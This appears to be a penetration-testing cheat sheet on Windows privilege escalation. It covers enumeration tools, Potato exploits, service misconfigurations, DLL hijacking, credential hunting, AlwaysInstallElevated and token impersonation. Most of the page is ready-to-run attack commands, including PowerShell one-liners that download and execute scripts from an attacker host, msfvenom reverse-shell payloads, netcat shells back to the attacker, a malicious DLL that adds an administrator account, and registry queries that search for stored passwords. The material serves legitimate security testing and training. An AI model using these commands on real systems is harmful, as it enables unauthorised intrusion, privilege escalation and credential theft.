Windows
This section contains a set of techniques that can be used to perform privilege escalation on Windows systems.
This subsection contains valuable tools to identify potential privilege escalation vectors.
- Local Exploit Suggester: Metasploit module (
post/multi/recon/local_exploit_suggester) for meterpreter enumerates the system looking for potential privilege escalation vectors. - JAWS: Identifies potential privilege escalation vectors. It is written in PowerShell2.0 so it can be used on Windows 7 and above.
Seatbelt.exe -group=system
# runs the following commands:
# AMSIProviders, AntiVirus, AppLocker, ARPTable, AuditPolicies,
# AuditPolicyRegistry, AutoRuns, Certificates, CertificateThumbprints,
# CredGuard, DNSCache, DotNet, EnvironmentPath,
# EnvironmentVariables, Hotfixes, InterestingProcesses, InternetSettings,
# LAPS, LastShutdown, LocalGPOs, LocalGroups,
# LocalUsers, LogonSessions, LSASettings, McAfeeConfigs,
# NamedPipes, NetworkProfiles, NetworkShares, NTLMSettings,
# OptionalFeatures, OSInfo, PoweredOnEvents, PowerShell,
# Processes, PSSessionSettings, RDPSessions, RDPsettings,
# SCCM, Services, Sysmon, TcpConnections,
# TokenPrivileges, UAC, UdpConnections, UserRightAssignments,
# WifiProfile, WindowsAutoLogon, WindowsDefender, WindowsEventForwarding,
# WindowsFirewall, WMI, WMIEventConsumer, WMIEventFilter,
# WMIFilterBinding, WSUS
- PowerUp: Tool for privilege escalation based on failures in the Windows configuration. (It gets hanging quite often)
echo IEX(New-Object Net.WebClient).DownloadString('http://<ATACKER_IP>/PowerUp.ps1') | powershell -noprofile -
powershell.exe -nop -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://<ATACKER_IP>/PowerUp.ps1');Invoke-AllChecks"
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
In this subsection, you will find how to exploit the Windows privilege SeImpersonatePrivilege in order to become an Administrator. Nonetheless, there are more Windows privileges that you can use to become an Administrator, as you can see in the following list.
Depending on the Windows version, you will need to use different exploits. In order to obtain the Windows version execute the following command.
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
- If the machine is either Windows 7, 8, 10 or Windows Server 2008 and 2012, try Hot Potato.
- If the machine is either < Windows 10 1809 or < Windows Server 2019, try Juicy Potato.
- If the machine is either >= Windows 10 1809 or >= Windows Server 2019, try Rogue Potato.
- For more updated versions, try PrintSpoofer.
- 1.
- 2.Generate a reverse shell.
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> -f exe > shell.exe
3. Set a listening port.
nc -nlvp <LISTENING_PORT>
4. Execute the exploit.
Potato.exe -ip <Victims_IP> -cmd "C:\Windows\Temp\shell.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true
powershell.exe -ep bypass "IEX(New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/Tater.ps1'); Invoke-Tater -Trigger 1 -Command 'C:\Users\user\Desktop\nc.exe <ATTACKER_IP> <LISTENING_PORT> -e cmd.exe'"
- 1.
- 2.Execute the exploit.
This is the default command, although it does not usually work.
JuicyPotato.exe -l 1337 -p c:\\windows\\system32\\cmd.exe -a "/c c:\\windows\\temp\\nc.exe -e cmd.exe <ATTACKER_IP> <LISTENING_PORT>" -t *
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe <LISTENING_IP> <LISTENING_PORT>" -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
This exploit is more complicated and requires more steps. Thus, here you have different PoCs that you can try to escalate privileges.
- 1.
- 2.Execute it
PrintSpoofer.exe -i -c "cmd.exe"
Windows systems can contain installed services that are being executed by privileged accounts. However, they can have misconfigurations that allow an attacker to escalate privileges.
Furthermore, look for service permissions like
SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS, SERVICE_STOP, SERVICE_START because they will help you modify the service configuration files, and if you have the last two permissions, you could restart a service executing the file you have overwritten.Finally, in this subsection, you will find techniques to exploit services misconfigurations to escalate privileges.
These commands are used to retrieve or modify information about services.
# Shows the owner of each service
tasklist /v
# Query the configuration of a service
sc.exe qc <ServiceName>
# Current status of a service
sc.exe query <ServiceName>
# Modify the configuration of a service
sc.exe config <ServiceName> <option>=<Value>
# Start/Stop a service
net start/stop <ServiceName>
This technique consists of modifying the attribute
binpath of services, with the purpose of executing a different executable or command at the service startup.There are several tools that can help you to identify Weak Service Permissiones:
u: Suppress warning and errors.w: Shows objects with write accessc: Display service namev: Verbose
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# In addition, the tool accesschk allows viewing the effective permissions on files, registry keys, logs, kernel objects...
accesschk64.exe -wvu <FolderPath>
# FOLDER PERMISSIONS
accesschk.exe /accepteula -uwdqs "Authenticated Users" C:\
accesschk.exe /accepteula -uwdqs "Everyone" C:\
# FILE PERMISSIONS
accesschk.exe /accepteula -uwqs "Authenticated Users" C:\*.*
accesschk.exe /accepteula -uwdqs "Everyone" C:\*.*
ModificableService accesschk
- PowerUp
Get-ModifiableService -Verbose
- Get-ServiceAcl
Import-Module .\Get-ServiceAcl.ps1
Get-ServiceAcl -Name VulnService2 | select -expand Access
- SharpUp
.\SharpUp.exe audit ModifiableServices
After enumerating the services whose attribute
BINARY_PATH_NAME is modifiable, edit the binpath by the file or command you want to be executed. Then, restart the service.sc config <Service_Name> binpath="<FILE_OR_COMMAND>"
net stop <SERVICE_NAME> && net start <SERVICE_NAME>
ModificableService BinPath
This vulnerability is similar to the previous one, but instead of weak permissions on the service, it is on the service binary itself so that it can be overwritten.
- SharpUp
.\SharpUp.exe audit ModifiableServiceBinaries
- PowerUp
# Gets services where the current user can write to the service binary path or its config
Get-ModifiableServiceFile -Verbose
Suppose the binary service path is not enclosed on quotes and contains white spaces. An attacker could place an executable in an upper directory within the binary path, being executed before the actual executable.
For example, the binary path
C:\Program Files\Proof of Concept\Vuln Service\executable.exe would be executed in the following order.C:\Program.exe
C:\Program Files\Proof.exe
C:\Program Files\Proof of Concept\Vuln.exe
C:\Program Files\Proof of Concept\Vuln Service\executable.exe
So, if an attacker can create files in one of the upper directories, it will gain code execution.
To obtain the vulnerable services to Unquoted Service Path there are two options.
For the following examples we will use the example service called "unquotedsvc".
- WMIC
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
- PowerUp
Get-UnquotedService -Verbose
PowerUp Unquoted Path
Then, with the command
Get-Acl '<DIR>' | fl you can see which users have access to the folder.- ShapUp
.\SharpUp.exe audit UnquotedServicePath
UnquotedService DirPermissions
All the system users have full control so that the file
common.exe can be added to the folder Common Files .Finally, the malicious file will be executed once the service "unquotedsvc" is restarted.
sc stop unquotedsvc
sc start unquotedsvc
DLLs are libraries containing code and data with the property of being used concurrently by several programs. If an attacker can overwrite some of the DLLs of a service, it could obtain code execution.
Using PowerUp you can obtain libraries on which you have write permissions. In this case is
C:\Temp\wlbsctrl.dll.
DLLHijacking PowerUP
To replace the DLL you need to create another DLL, which can be found at the following link, replacing the command you want to execute.
// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k net localgroup administrators user /add");
ExitProcess(0);
}
return TRUE;
}
Then, you need to execute the following commands to compile the library.
sudo apt update && sudo apt install mingw-w64 -y
x86_64-w64-mingw32-gcc windows_dll.c -shared -o wlbsctrl.dll
Finally, overwrite the DLL and restart the service:
sc stop dllsvc & sc start dllsvc
A pentester can search for credentials stored in registry or windows files with the following commands.
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon" /f password /t REG_SZ /s
# Search for credentials in the HKEY_LOCAL_MACHINE hive
reg query HKLM /f password /t REG_SZ /s
# Searches for credentials in the HK_CURRENT_USER Hive
reg query HKCU /f password /t REG_SZ /s
# Find config files that usually have stored credentials
dir c:\*vnc.ini /s /s /b
dir c:\*ultravnc.ini /s /b
dir c:\*vnc.ini /s /b /s /b | findstr /si *vnc.ini
# Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*
In addition, credentials can also be found in the following:
Files
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
Registry
# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
Cached credentials of domain users for a specific machine may be found in the session of a compromised user.
The following command is used to list the cached credentials:
C:\> cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator
Finally, in order to use the stored credential we need to execute the following command:
C:> C:\Windows\System32\runas.exe /user:domain\Administrator /savecred "<COMMAND or PROGRAM to be executed>"
This policy allows any user to use elevated permissions for installing any program on the system. Thus, an attacker can create a malicious installer that would be executed with higher privileges gaining privilege escalation.
There are two options for detecting whether we can employ this privilege escalation.
- PowerUP
AlwaysInstallElevated PowerUp
- Checking the registry values.
PS C:\Users\TCM> reg query HKLM\Software\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
PS C:\Users\TCM> reg query HKCU\Software\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
To exploit this configuration create a
*.msi document with msfvenom and install it on the remote machine.Note: It is possible that if you install the file using winexec it may not work because the user does not have permission to run it remotely. To fix this, you should use a remote desktop and run the manually generated installer.
msfvenom -p windows/shell_reverse_tcp lhost=<IP> lport=4444 exitfunc=thread -f msi -o shell.msi
C:\Users\TCM> msiexec /quiet /qn /i .\shell.msi
The meterperer module
incognito on merterpreter allows the attacker to extract available Delegation Tokens.meterpreter> load incognito
meterpreter> list_tokens -u
Delegation Tokens Available
[...]
meterpreter> impersonate_token <LISTED_TOKEN>
If an attacker has gained execution of code on a service with the ability to impersonate users or has access to the accounts "NETWORK SERVICE" or "LOCAL SERVICE", it could escalate privileges with churrasco.
churrasco.exe "nc.exe 10.10.14.2 1234 -e cmd.exe"
An elevation of privilege vulnerability exists in the Windows certificate dialog box when it does not properly enforce user privileges, also known as the "Windows certificate dialog box elevation of privilege vulnerability". To exploit this vulnerability follow this video.
In order to exploit Kernel vulnerabilities on windows, it is necessary to know if there are any patches or hotfixes already installed on the victim's system.
wmic qfe
# Brief
wmic qfe get Caption,Description,HotFixID,InstalledOn
Get-Hotfix
It is also important, to check the system architecture. Which can be obtained as follows:
# CMD
SET Processor
# PowerShell
[Environment]::Is64BitProcess
Vanilla PowerShell is run on 32-bit so 64-bit exploits will not work, for this you need to use 64-bit PowerShell found at:
C:\Windows\sysnative\WindowsPowershell\v1.0\powershell.exe
There are different tools capable of finding which exploits work for the version of Windows under attack.
Windows Exploit Suggester detects possible missing patches on the target. It also notifies the user if public exploits and Metasploit modules are available for missing bulletins. (Requires Python2.7).
In order to use the tool, it is necessary to run
systeminfo on the victim machine and copy it to a file on the attacking machine.python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database <DOWNLADED_DATABASE> --systeminfo <VICTIMS_SYSTEMINFO>
Watson lists Windows HotFixes and suggests exploits for privilege escalation. However, it requires prior compilation.
Sherlock quickly finds missing windows patches to escalate privileges, but it takes a while to finish.
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://<ATACKER_IP>/Sherlock.ps1');Find-AllVulns"
Last modified 8mo ago